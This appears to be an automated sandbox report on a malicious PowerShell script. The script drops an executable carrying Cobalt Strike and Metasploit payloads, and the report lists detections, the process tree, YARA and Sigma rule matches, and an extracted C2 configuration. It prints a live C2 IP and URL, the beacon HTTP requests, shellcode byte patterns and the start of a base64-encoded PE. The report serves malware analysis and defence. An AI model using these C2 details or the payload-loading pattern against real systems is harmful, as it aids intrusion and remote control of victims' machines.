Edit tour

Windows Analysis Report
fabd6ab15a0540d197f1ceaa312308b8.ps1

Overview

General Information

Sample name:	fabd6ab15a0540d197f1ceaa312308b8.ps1
Analysis ID:	1602897
MD5:	8e117177bf5213213a857e0772e0d879
SHA1:	34cd43115fd3afc87867b7fafed5d22efd7209fd
SHA256:	c22079f6740eb864daa646b8d6f6a6d038482db3830ec0dd47fa3b0893c9eb0c
Tags:	156-253-250-62ps1user-JAMESWT_MHT
Infos:

Detection

CobaltStrike, Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

Yara detected Metasploit Payload

C2 URLs / IPs found in malware configuration

Found API chain indicative of debugger detection

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Machine Learning detection for dropped file

Powershell drops PE file

AV process strings found (often used to terminate AV products)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tmpE651.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\tmpE651.exe" MD5: A7E64FEA00D97B963D90E53093D5E220)

WerFault.exe (PID: 6984 cmdline: C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{
  "C2Server": "http://.17.10.250:80/EkTY",
  "User Agent": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
}

Threatname: Metasploit

{
  "Headers": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n",
  "Type": "Metasploit Download",
  "URL": "http://3.17.10.250/EkTY"
}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x5dd7:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x5e43:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Process Memory Space: powershell.exe PID: 4312	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x20b78:$b1: ::WriteAllBytes( 0x25a0f8:$b1: ::WriteAllBytes( 0x1a579:$b2: ::FromBase64String( 0xebf7:$s1: -join 0x162cc:$s1: -join 0x46a68:$s1: -join 0x46aa3:$s1: -join 0x46b5d:$s1: -join 0x46b8b:$s1: -join 0x46d17:$s1: -join 0x46d3a:$s1: -join 0x46fed:$s1: -join 0x4700e:$s1: -join 0x47040:$s1: -join 0x47088:$s1: -join 0x470b5:$s1: -join 0x470dc:$s1: -join 0x47107:$s1: -join 0x47123:$s1: -join 0x4718c:$s1: -join 0x47613:$s1: -join

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", ProcessId: 4312, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", ProcessId: 4312, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Spreading
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://3.17.10.250/EkTY

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Avira: detection malicious, Label: HEUR/AGEN.1345031

Found malware configuration

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: CobaltStrike {"C2Server": "http://.17.10.250:80/EkTY", "User Agent": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"}
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://3.17.10.250/EkTY"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

ReversingLabs: Detection: 86%

Multi AV Scanner detection for submitted file

Source: fabd6ab15a0540d197f1ceaa312308b8.ps1

ReversingLabs: Detection: 21%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Joe Sandbox ML: detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://.17.10.250:80/EkTY
Source: Malware configuration extractor	URLs: http://3.17.10.250/EkTY

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: global traffic

HTTP traffic detected: GET /EkTY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: 3.17.10.250Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

HTTP traffic detected: GET /EkTY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: 3.17.10.250Connection: Keep-AliveCache-Control: no-cache

Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp, tmpE651.exe, 00000002.00000002.1877232038.00000000000D6000.00000004.00000020.00020000.00000000.sdmp, tmpE651.exe, 00000002.00000002.1877232038.00000000000CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.17.10.250/EkTY
Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.17.10.250/EkTYs
Source: powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116

Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPED	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winPS1@5/11@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3848

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0futhai.pka.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: fabd6ab15a0540d197f1ceaa312308b8.ps1

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe"
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAA

Source: tmpE651.exe.0.dr

